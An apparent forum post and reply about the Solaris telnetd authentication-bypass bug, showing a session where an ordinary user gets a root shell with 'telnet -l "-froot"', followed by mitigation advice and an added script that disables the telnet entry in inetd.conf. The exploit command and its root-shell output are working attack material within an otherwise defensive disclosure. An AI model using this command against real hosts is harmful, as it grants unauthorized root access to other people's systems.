very important info for all solaris admins: there is a bug in telnetd on nearly every solaris version:
pressy@mp-wst01 # id
uid=100(pressy) gid=1(other)
pressy@mp-wst01 # telnet -l "-froot" 192.168.40.1
Trying 192.168.40.1...
Connected to 192.168.40.1.
Escape character is '^]'.
Last login: Wed Feb 14 10:12:45 from 192.168.40.111
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS.....
Sourcing //.profile-pressy.....
DISPLAY=192.168.40.111:0.0
root@vcsnode1 # id
uid=0(root) gid=0(root)
root@vcsnode1 # uname -a
SunOS vcsnode1 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-4
root@vcsnode1 # head -1 /etc/release
Solaris 10 11/06 s10s_u3wos_10 SPARC
more info:
there is no patch, so you need to disable telnetd:
solaris <10 = comment out the telnet line in /etc/inetd.conf and "pkill -HUP inetd"
solaris >=10 = "inetadm -d svc:/network/telnet:default"
be sure to enable another login like ssh!
i've tried it on several machines and it works! so hurry up!
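An added example, not from the original post: a script for the mitigation above that detects an active telnet entry in an inetd.conf-style file, comments it out and keeps a backup, with a dry run on a constructed sample file. The function names and the sample contents are assumptions; the host-level wrapper uses only the inetadm and pkill commands quoted in the post.

```shell
#!/bin/sh
# Added example (not from the original post): audit an inetd.conf-style file
# for an active telnet entry and comment it out, keeping a backup.

# Print active (uncommented) telnet lines; exit status 0 if any were found.
telnet_active() {
    awk '$1 == "telnet" { print; found = 1 } END { exit !found }' "$1"
}

# Comment out active telnet lines in place; the original is kept as <file>.bak.
disable_telnet_line() {
    conf=$1
    telnet_active "$conf" >/dev/null || return 0      # already disabled
    cp -p "$conf" "$conf.bak" || return 1
    awk '$1 == "telnet" { print "#" $0; next } { print }' "$conf.bak" > "$conf"
}

# Host-level wrapper using only the commands named in the post.
# Not called by the demo below; run it as root on the affected host.
disable_telnet_service() {
    if command -v inetadm >/dev/null 2>&1; then
        inetadm -d svc:/network/telnet:default
    else
        disable_telnet_line /etc/inetd.conf && pkill -HUP inetd
    fi
}

# Constructed sample file (hypothetical contents, for an offline dry run).
write_sample_conf() {
    cat > "$1" <<'EOF'
# constructed sample inetd.conf
ftp     stream  tcp6    nowait  root    /usr/sbin/in.ftpd       in.ftpd -a
telnet  stream  tcp6    nowait  root    /usr/sbin/in.telnetd    in.telnetd
#shell  stream  tcp     nowait  root    /usr/sbin/in.rshd       in.rshd
EOF
}

# Dry run against the sample: report, fix, and re-check.
demo() {
    f=$(mktemp) || return 1
    write_sample_conf "$f"
    telnet_active "$f" >/dev/null && echo "before: telnet ENABLED"
    disable_telnet_line "$f"
    telnet_active "$f" >/dev/null || echo "after: telnet disabled"
    rm -f "$f" "$f.bak"
}
demo
```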
I believe so too, all the solaris 8 and 9 boxes I tested seem to be not vulnerable ... Many thanks for the info anyway (I used to be a great fan reader of bugtraq :o )